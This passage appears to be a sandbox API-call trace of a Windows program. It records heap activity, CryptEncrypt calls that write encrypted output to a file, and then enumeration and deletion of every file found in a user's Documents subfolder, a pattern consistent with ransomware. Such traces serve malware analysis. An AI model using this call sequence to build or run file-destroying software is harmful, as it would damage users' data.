hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0220.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.941] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0220.944] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0220.944] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.944] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.944] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ec8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ec8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0220.944] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.944] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.944] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.944] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.945] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.945] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.950] WriteFile (in: hFile=0x524, lpBuffer=0x2a71ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71ea8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0220.951] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0220.951] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0220.951] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.951] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab920, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.951] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0220.951] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.951] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.951] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.951] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.951] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.951] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.951] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.952] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.952] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.952] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.952] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.952] CryptReleaseContext (hProv=0xa7bd58, dwFlags=0x0) returned 1 [0220.952] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.952] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.952] FreeLibrary (hLibModule=0x76390000) returned 1 [0220.952] CloseHandle (hObject=0x524) returned 1 [0220.953] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.953] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/uhe R_MajVPhj", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj", lpFilePart=0x8cedf4*="uhe R_MajVPhj") returned 0x27 [0220.953] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj")) returned 0x10 [0220.953] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15d0d200, ftCreationTime.dwHighDateTime=0x1d5d667, ftLastAccessTime.dwLowDateTime=0x5ecd6570, ftLastAccessTime.dwHighDateTime=0x1d5cba1, ftLastWriteTime.dwLowDateTime=0x5ecd6570, ftLastWriteTime.dwHighDateTime=0x1d5cba1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1eb8 [0220.953] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15d0d200, ftCreationTime.dwHighDateTime=0x1d5d667, ftLastAccessTime.dwLowDateTime=0x5ecd6570, ftLastAccessTime.dwHighDateTime=0x1d5cba1, ftLastWriteTime.dwLowDateTime=0x5ecd6570, ftLastWriteTime.dwHighDateTime=0x1d5cba1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0220.953] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ac0a70, ftCreationTime.dwHighDateTime=0x1d5c897, ftLastAccessTime.dwLowDateTime=0xeb886840, ftLastAccessTime.dwHighDateTime=0x1d5cabe, ftLastWriteTime.dwLowDateTime=0xeb886840, ftLastWriteTime.dwHighDateTime=0x1d5cabe, nFileSizeHigh=0x0, nFileSizeLow=0xeabc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="0xJF L.rtf", cAlternateFileName="0XJFL~1.RTF")) returned 1 [0220.953] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\0xJF L.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\0xjf l.rtf")) returned 1 [0221.000] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935de700, ftCreationTime.dwHighDateTime=0x1d5ccfb, ftLastAccessTime.dwLowDateTime=0xa5f95e40, ftLastAccessTime.dwHighDateTime=0x1d5d579, ftLastWriteTime.dwLowDateTime=0xa5f95e40, ftLastWriteTime.dwHighDateTime=0x1d5d579, nFileSizeHigh=0x0, nFileSizeLow=0x451e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CrmZzovOa.ppt", cAlternateFileName="CRMZZO~1.PPT")) returned 1 [0221.000] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\CrmZzovOa.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\crmzzovoa.ppt")) returned 1 [0221.018] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f11e20, ftCreationTime.dwHighDateTime=0x1d5c9ba, ftLastAccessTime.dwLowDateTime=0xa081b380, ftLastAccessTime.dwHighDateTime=0x1d5d0cf, ftLastWriteTime.dwLowDateTime=0xa081b380, ftLastWriteTime.dwHighDateTime=0x1d5d0cf, nFileSizeHigh=0x0, nFileSizeLow=0xcae7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kkqMO4TPv-wa6.ods", cAlternateFileName="KKQMO4~1.ODS")) returned 1 [0221.018] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\kkqMO4TPv-wa6.ods" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\kkqmo4tpv-wa6.ods")) returned 1 [0221.037] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85057130, ftCreationTime.dwHighDateTime=0x1d5c9ce, ftLastAccessTime.dwLowDateTime=0x2ec66f40, ftLastAccessTime.dwHighDateTime=0x1d5cbea, ftLastWriteTime.dwLowDateTime=0x2ec66f40, ftLastWriteTime.dwHighDateTime=0x1d5cbea, nFileSizeHigh=0x0, nFileSizeLow=0x7b92, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="sMIrSnuw1.odp", cAlternateFileName="SMIRSN~1.ODP")) returned 1 [0221.038] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\sMIrSnuw1.odp" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\smirsnuw1.odp")) returned 1 [0221.043] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7de78c0, ftCreationTime.dwHighDateTime=0x1d5d57c, ftLastAccessTime.dwLowDateTime=0x2e7c1800, ftLastAccessTime.dwHighDateTime=0x1d5d3ba, ftLastWriteTime.dwLowDateTime=0x2e7c1800, ftLastWriteTime.dwHighDateTime=0x1d5d3ba, nFileSizeHigh=0x0, nFileSizeLow=0x189ed, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W3ImPSb3T7kG1Tta5.odp", cAlternateFileName="W3IMPS~1.ODP")) returned 1 [0221.043] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\W3ImPSb3T7kG1Tta5.odp" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\w3impsb3t7kg1tta5.odp")) returned 1 [0221.065] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509708b0, ftCreationTime.dwHighDateTime=0x1d5cd79, ftLastAccessTime.dwLowDateTime=0x88cb6c40, ftLastAccessTime.dwHighDateTime=0x1d5d205, ftLastWriteTime.dwLowDateTime=0x88cb6c40, ftLastWriteTime.dwHighDateTime=0x1d5d205, nFileSizeHigh=0x0, nFileSizeLow=0x15ebe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="yDZDGhQwXxI7EU9RBVRE.csv", cAlternateFileName="YDZDGH~1.CSV")) returned 1 [0221.065] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj\\yDZDGhQwXxI7EU9RBVRE.csv" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj\\ydzdghqwxxi7eu9rbvre.csv")) returned 1 [0221.073] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509708b0, ftCreationTime.dwHighDateTime=0x1d5cd79, ftLastAccessTime.dwLowDateTime=0x88cb6c40, ftLastAccessTime.dwHighDateTime=0x1d5d205, ftLastWriteTime.dwLowDateTime=0x88cb6c40, ftLastWriteTime.dwHighDateTime=0x1d5d205, nFileSizeHigh=0x0, nFileSizeLow=0x15ebe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="yDZDGhQwXxI7EU9RBVRE.csv", cAlternateFileName="YDZDGH~1.CSV")) returned 0 [0221.073] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0221.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d58 | out: hHeap=0x2af0000) returned 1 [0221.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0221.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.074] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0221.074] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0221.074] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0221.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0221.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0221.075] 